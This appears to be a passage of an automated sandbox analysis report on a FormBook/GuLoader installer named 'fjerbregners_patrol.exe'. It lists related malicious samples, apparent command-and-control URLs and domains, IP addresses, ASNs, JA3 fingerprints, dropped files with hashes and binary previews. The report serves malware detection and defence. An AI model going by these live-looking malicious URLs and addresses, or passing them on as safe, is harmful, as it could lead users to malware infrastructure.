                                                                                                                                                                          • www.legalinmedia.online/czqe/?4KMOv=iZEcve1ptS-B&33=tmPLtdQmG5EgDH62Di1t+8XyVfmJ/0V3Si35WS3tzLP/L+5KIzdiYwApdM8wp8uIO8XblN4ayLEwz7IL0uZvdsfqmDJuUQUxMslCM4B5Fuik
                                                                                                                                                                          vbc (2).exe.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.quantvenue.com/ttju/?5jLlmd5P=T/Klsf9VO2CEK0fo7FxVrMV0Nv/zGO+nWJDe7d1ww4+qcaZY3a9+QD2IYCvr2L+FIrIO&YJE=GTqt_Lg

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          www.kepaoqin.toprPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 107.148.17.67
                                                                                                                                                                          images.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 107.148.17.67
                                                                                                                                                                          www.legalinmedia.onlinerPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.189.114.27
                                                                                                                                                                          RFQ#_R&E-S194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.189.114.27
                                                                                                                                                                          HSBC_Advice,pdf.bat.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • 91.189.114.27
                                                                                                                                                                          www.ladakhzesmo.comrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 119.18.54.51
                                                                                                                                                                          www.fgnvcmef.clickrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 43.154.67.170
                                                                                                                                                                          www.zenturasolutions.comrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 172.67.219.102
                                                                                                                                                                          www.openlend.latrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 169.150.247.38
                                                                                                                                                                          HSBC_Advice,pdf.bat.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • 89.187.165.194

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          ASN-QUADRANET-GLOBALUSrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 96.44.182.131
                                                                                                                                                                          1T5YhT23m5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 107.178.143.17
                                                                                                                                                                          B2dVozZShI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 64.188.25.4
                                                                                                                                                                          Femetageshuse.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 172.93.161.249
                                                                                                                                                                          xFLnAO9FDR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 173.254.247.87
                                                                                                                                                                          anfrselens.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 172.93.161.245
                                                                                                                                                                          Befragtet.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 172.93.161.25
                                                                                                                                                                          Konsekvensrettelser.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 172.93.161.248
                                                                                                                                                                          Payoffs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 64.188.25.4
                                                                                                                                                                          WB_Documents_No-285380XXX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 66.63.163.71
                                                                                                                                                                          5Y222z61xB.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 72.11.134.77
                                                                                                                                                                          zCC868G89h.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 64.188.25.4
                                                                                                                                                                          jadcXh03sw.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 154.205.78.176
                                                                                                                                                                          NewOrder0578657875678788.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                          • 104.223.35.34
                                                                                                                                                                          Eu3k87iwJA.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                          • 104.223.35.34
                                                                                                                                                                          nuMLZVHbQf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                          • 155.94.185.15
                                                                                                                                                                          code9.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                                                          • 45.61.169.91
                                                                                                                                                                          ATT00001.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 173.254.235.21
                                                                                                                                                                          Fattura_Payment_202360556.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 172.93.161.118
                                                                                                                                                                          update_SC.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 144.172.67.172
                                                                                                                                                                          NAMECHEAP-NETUSzDY1ZDmi3Y.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 162.0.232.65
                                                                                                                                                                          rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 162.0.239.145
                                                                                                                                                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 199.188.200.141
                                                                                                                                                                          Ordem_de_compra_confirmada_OC_215_Nortaluga_Lda_08082023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.54.117.212
                                                                                                                                                                          jcKGapir5p.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.54.117.211
                                                                                                                                                                          https://ipfs.io/ipfs/QmYjEuTtoZzmaj2utoZjrnnrjzQw3yJnx7bKBxeXwY4h2j?filename=Nsolution.html#hdaily@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 63.250.38.114
                                                                                                                                                                          http://freewebsitesubmission.12com.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 192.64.119.254
                                                                                                                                                                          http://freewebsitesubmission.12com.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 192.64.119.254
                                                                                                                                                                          Doc25790008pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 63.250.35.178
                                                                                                                                                                          aM2keVo29a.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                          • 68.65.123.197
                                                                                                                                                                          Eu6nhMBv9d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 162.255.119.117
                                                                                                                                                                          https://www.linkedin.com/slink?code=g7r25M-r#c3RlcGhhbmllLmJldGFuY291cnRAcmF2ZWlzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 68.65.122.59
                                                                                                                                                                          AZ05cBmVXX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 198.54.116.202
                                                                                                                                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.5660.13326.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 162.0.225.178
                                                                                                                                                                          z16BdmYGIj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.54.117.215
                                                                                                                                                                          iNtlHI4zWX.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.54.117.218
                                                                                                                                                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 198.54.117.218
                                                                                                                                                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 199.188.200.141
                                                                                                                                                                          DHL_AWB_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.54.117.218
                                                                                                                                                                          36XNMp5O89.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 192.64.119.113

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19WSetup-Password-123.rarGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          #U5831#U50f9#U8acb#U6c42_(NTU_202308-10TW)#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          (#Uc11c#Uc6b8#Ub300#Ud559#Uad50)_230809QUOT_-_0329KR.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          XUCN5hI9xKdNFXa.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          2g3yIqHc6Z.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          tgmap.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          n7lAnu6bK6.exeGet hashmaliciousAmadey, RedLine, RedeemBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          revenue-en-local_lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          1iqpDUPZm5.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          kU8gXjwA8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          Update.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          glicthed_toilet.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          Y5abO1HPBf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          Y5abO1HPBf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          CTjxhc.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          CTjxhc.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          Updated_SOA.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129
                                                                                                                                                                          Indk#U00f8bsordre_672363#pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                          • 142.250.185.206
                                                                                                                                                                          • 142.250.185.129

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dllrPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                            rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              RFQ_00199199000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                RFQ_00199199000.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  Caliologist.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                    Caliologist.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                      1449S.23.EMMET.SR.NApdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                        1449S.23.EMMET.SR.NApdf.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1577Z44ZL

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):122880
                                                                                                                                                                                          Entropy (8bit):1.1414673161713362
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                                                                          MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                                                                          SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                                                                          SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                                                                          SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):11776
                                                                                                                                                                                          Entropy (8bit):6.021689811183493
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:S9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:SJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                                                                                                                                                          MD5:8508FA0AB17E36E071687243283C2AEF
                                                                                                                                                                                          SHA1:D45391D0454FBB9EB66FA72ECF0E2CADF0522BFE
                                                                                                                                                                                          SHA-256:90F3CEBB5B3759EB1BD72CEE7CD8B694440EE398FE970B763DB7A7B67208E4C8
                                                                                                                                                                                          SHA-512:241CF26E57006402897D8ADAFF37F3006C1BDBB09D6C5D10C32D556996DF5785DC81C35CCBBC74384F80853A3E4AEA7BE251A4FA2613BE42108E11A00692DF5A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: rPRESSUREREDUCINGVALVE_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: rPRESSUREREDUCINGVALVE_pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: RFQ_00199199000.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: RFQ_00199199000.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Caliologist.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Caliologist.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 1449S.23.EMMET.SR.NApdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 1449S.23.EMMET.SR.NApdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t..!...!...!...T...!...Y...!...!...!...T...!...T...!...T...!...T...!..Rich.!..........................PE..L...s..d.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsw84C1.tmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):772547
                                                                                                                                                                                          Entropy (8bit):5.221589378683733
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:cko+Y5ie2RaRgYO5GZkAUaHPVby3OkM8rYaaqHVoIidOLc2G/GSvT6iLkQL:cQY5i7Rac5G7vVEOkrrXDapEpzWhLk
                                                                                                                                                                                          MD5:003CF5A066F142028A852F6B24912B0D
                                                                                                                                                                                          SHA1:B3D025E6F28E76F5936A559CCDE705381199CF1F
                                                                                                                                                                                          SHA-256:533D40A884731909E3224BFFF861688EC32B2D89179B6F5BD978D2FD0C4A4AFA
                                                                                                                                                                                          SHA-512:EFF8BA5E497F635D68670251BC88AA97DE2BC3CC9D1630E204214A6DA69ABD8E9EA30FE65C1196C6BE7ECD4214A9327323069AD6BDC90E3DAD5223652B1429BD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.I......,...............<........6.......H.......H..........................................................................................................................................................................................................................................J...W...........D...j...............................................................................................................................................&.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\drvelens\anskrevne\Heptahedron\Liberaliseringernes\Ruby\Weet\Schufter.het

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):10182
                                                                                                                                                                                          Entropy (8bit):7.982324972078668
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:uP8JZ/ApF+7ypmj8XYt9T+u8ScUdxdk1sB9ZqGw7nf4RjgbEkHLYKf:Q8J6+Ai8XoJRcUfdkyB9ELjJLf
                                                                                                                                                                                          MD5:29A88ACC377B18DBDEE43F49D953903F
                                                                                                                                                                                          SHA1:64B1B3C5F4DEBB63297E06C54B7B7C59D51E3F21
                                                                                                                                                                                          SHA-256:20CFC649792647D7393A3E503D6DEAE6196E414390E35DA8F673BEC9CE2E8D30
                                                                                                                                                                                          SHA-512:5E10D16DD88358318A3DDF4105F7C18707FE16F7E0D4D8A77331098D52F9BECBDBF42B83DB5FF26E7546668353B1800DB4448A63D05BDFF69BF66E941435F087
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..L..j..X..u..B..{.B..._.c...>R......g$..?..v...*..........9s...{ZY.>./.P.:.?..k.Z<.o [.....Q...zn..BV.....2....Qj...s.c$H".g..@u}...........a...H..ok-e\.I.<."..n.Ml......-..[Y.U...1.J.....>A..?8...=...+d:..D}.J8vL\e..=2O\.y...[gh";..v....i}v.v _2..J.....N^....i..l....L<.q.r2.jR......y.m.o.x..A.k/.[]....E~.;...N.do!.1..........JF.?.7.....S... }..wI.........Wp......*..4P.*..Y...F...W..6..t&.b\<).i.......W.al...........O..e.\..Jz.>:4..<.L.b..?u...k..8....P....h.h.?..*....B/.?^.[G....AU..O35..3......R.K..(w=..`P.O*.O.g...a.F....Wq..+....w.hC.g....#....ZcH'..F.R...|...`.a..".i8.W.Bbz7,Wb..L.'...X.'......;.>..8i.{.#jk..4...W........`.G.o...Z...j}...A.....+..4.=...C......l2:.....H...l$*B.Q...q...P..G.,.*.P.s .....VRa..i.Z*............-l...C.....nK$.......1..$........9.r....3.aIv.(.D...F4..[.A...ZY1.}..y.,`.....@D.8.a+..f.%....#.(..7..n,.Y.4..V..6...h.m..8^.L....=... +..'...h.+ow...I......o.b%...D........|.h..$.t...._u...........;.s.......

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\drvelens\anskrevne\Hrfarvet\Reflectors254.ova

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):7827
                                                                                                                                                                                          Entropy (8bit):7.9738223182541095
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:Huwc/LLMKclX8kfNkdIpSsh2c9SwcDsbhOZCqhCAkUA:C8KQMkyyS6bOUePA
                                                                                                                                                                                          MD5:FBF9E5E4B43E1B92CC1563FD0B8DEF77
                                                                                                                                                                                          SHA1:E66F738008933720859AB5ACB67BBE267D0DAF49
                                                                                                                                                                                          SHA-256:1226B2EEAD83CCEC610AB84CDC8F4BE6985C1B66D8B2C737BB5A9EF82433E0F1
                                                                                                                                                                                          SHA-512:A8B934A8C2C7DDF1DF9D979F8AA435AEFE444EFFABD41E0C54F00FFF324EDB76BDD7BEB6CCC0904BEF638C8DFEC00D074C3368E86EC51063F4F08DEB4D816116
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:....o....Q.... g...`.fUL.a......G.y.P.g..............[zA...E.t.L.%...........|.."1evf:'.@.................-.9..A@..p.).3..i........lx.v.H....gU:..7D...1"M>.k...G...v$..L;.....o....y...X.D.b .V....0./.{(......82....1.....B..p.....;k...b.<..)...(.P....O.Au0..qA'.._&{.b.B;.Z....2.>.5..=~.[..Wr'.D..B3......m...v.....Q../g.$K.f./..oU..".-../'....!......<.T.....W.=.=.?.2x.zi..e...=%..i..mq.z...S..../&..=...2i.....?......|.n..7WRe........6....C".?......VZ...V.d....$.-...-.!7.F.<..=.(..8^./.$.....$.iu..GrQ.JD..>[Y..q....AzG..=.>...d1bfj.s..Zx.L..U..>j6.w.r..........yD9.c.."1NVQ.......Wb.9...~..x.s.....[.0..j#..........O..2}m..Z..V.........E..)./B....../..B ....C.|...lj....)..I....\.......#....b..P...B.2..@.....k..q..`).o.P.z1.3.r.=";Q.H.nj...F..a-.:......9.D...9.D.:l4..'..D0&......IC..I....b=...A.O....V%.u.}.I..Z\.D.6F9=T.....-...Z8.sd.t.kft. -7|2..<.Zt.X.V.x.MX.....}..4./.....!n.l'.XzJ.$.....M.5^}.Z..!:..,?.n.eYe.s.O..0I..ra..Q.j.n.V.U.9.4....[...4..

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\drvelens\anskrevne\Hrfarvet\forforstrkningerne.Mus

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):261989
                                                                                                                                                                                          Entropy (8bit):4.600808717873687
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:I89V0hAs4afSxVX3/424kfAApiPJt97MtDumcaDsa9xn5vGQEoIGS7+:I8rYaaqHVoIidOLc2G/GSy
                                                                                                                                                                                          MD5:A831B976AAED2C3B4EA6BD3005295221
                                                                                                                                                                                          SHA1:5B541F8E5B30E64604301E0448AA89A928CB05C5
                                                                                                                                                                                          SHA-256:5F20A828D03C2578C95801CF5FCA17680EF8852BE7799A830403F8641763DB56
                                                                                                                                                                                          SHA-512:9D13AF76D6F187BD61515AC8011B552DBC66389E57B4831931E93CE213FB29B488926B1698DF80D3623025CA9553F429DFB87ABD96DE3003049411BE2EAC6C79
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...|......PP....>...................................DD.Y...........:.g.......................M...!...................u...).MMM..............PPPP..............`..gg.........QQQ................//.......qqq..j.yyy.uu.pp.......K.)..kkk.....nnn..................(((((............II.~~..........K.!.p............]]...111......................8....JJJJJ...................M..............f....<...].............u.....777. ...s.0...u......C..g........E."".....0.......M..***..........G..F..ff..............7...J...................................................a......6.....OO.~~...9..........11.........)...11.f.......__..........\\\......).222....0.............................V..........]]..................@.......;......S.p......ffff.....O.......)).@..'.....t....................$....4...........................{{.........J........TT......;...............%.....QQQQQ......................K...............W.<<...../...........]].................s................P............Q.........................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\drvelens\anskrevne\Salgspriserne\Flsomheden\Vergil\Sauropterygian.Rec

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):453788
                                                                                                                                                                                          Entropy (8bit):4.473360269524128
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:9wQcQgy25i1ix2RaRgYOOi8nyWqEpVaAUc8stzaoRXDr4HOG0y3yzFu:i+Y5ie2RaRgYO5GZkAUaHPVby3Ou
                                                                                                                                                                                          MD5:CCD7BF190AA4CAEFCF1E116C0010EA27
                                                                                                                                                                                          SHA1:82A03DFBF6B2CCD0611A033B5893355E28C3E16B
                                                                                                                                                                                          SHA-256:900A6F5AEB9D948F98E9CC4C43AD5AF4378FCB330EA53D5600594C21291998E1
                                                                                                                                                                                          SHA-512:0AB9E9ABC62ADB0BE8F19E7A517A855CEE3C57AA85DF34466062E45F1B7DAEF2F7356E45C21C1D26409D1FCE995079DFA25699F000CCE5550D7FC01D9BC431CF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly\lensstyres.erh

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8251
                                                                                                                                                                                          Entropy (8bit):7.976906660624667
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:+n0ezXV+ygUn3XptqaBtATqf4vJ70yzV94HtQHPB2Ng4:A02XVRFXptqaBt7A90yzV94+HPBy
                                                                                                                                                                                          MD5:61AACB4EE807E79B4CA3A6E445DA986C
                                                                                                                                                                                          SHA1:3F128C181F01101295593D4974F620FF3B541440
                                                                                                                                                                                          SHA-256:532DB6982417EA55672506592097CCFE885F3649014602403C37232306E37E4F
                                                                                                                                                                                          SHA-512:7B81DC8AE6AE42BCD48FABC0B73081ECF084E2BF3781025CA33488BB467DABBEB71D968F0D7C7C7485727CE9EE77F7D39E5D7F27C979591235C3AC9598CB2C11
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.A.n..Z....*A.".......dv..E..3...'l.Irvx.v.i..@E..-...x.}e...d..y..Kqnz. ...Dp....c?.....@y..V.....k.... Z.ux......S.Z;...ig.E..K.!t.9..!.d......k...0.78*.An..HF.T!.v.*<..e......}?..'...A...i&.........|C...P.F9"25.RT.Z.h...c....bzfu....B@'...M't.#.....n........)h.Q..onb..."A.v..W~r....?.O Yb.?.O..bV..u .....`..O......v...go8.....tV.h;..w..#..E.......GH.....~[ew......,T..8...F[&v\..@.#...<...w..'q#...".w...c.m....$N.G\.-.....A....<.Um....}..~2..m.....m....SC..n....v.e..z.y..u.U.u....._..j.Z...Y\.sy....EI....#>..#.X#.l....J.8A.Y.....9.G.A|zIE.7.Za8.XB........Z.s$Ex.z...x...I..........jV...8e.ir...1.|...@./.......D..*...Z....M....,.....C...a...G..@M..e..+xT.1K.@.s.._...Z...M.L..%k....SW.C.p..........z...9...5..8Ag.K..a;.jj....V.uU.o.......0...&dp..q>..M.....;n./..2...aKR..W.....eV(..1:G..g...~.?.}m:<!J.8..[.....m..T:....T.......h6.}C..Y..F....h%...#.!....Z....k.y....1j.D..L..~R..T...[.v.+......n..d..#.....Ru0B..;...w.a.......(Q.e_...Z..t

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                          Entropy (8bit):7.389874468960812
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:fjerbregners_patrol.exe
                                                                                                                                                                                          File size:497'089 bytes
                                                                                                                                                                                          MD5:d7c6ba8af8325a9fc1ac197916eecfda
                                                                                                                                                                                          SHA1:0e5ed5755b2cfcbae6ff623ec1af957b43ebf75d
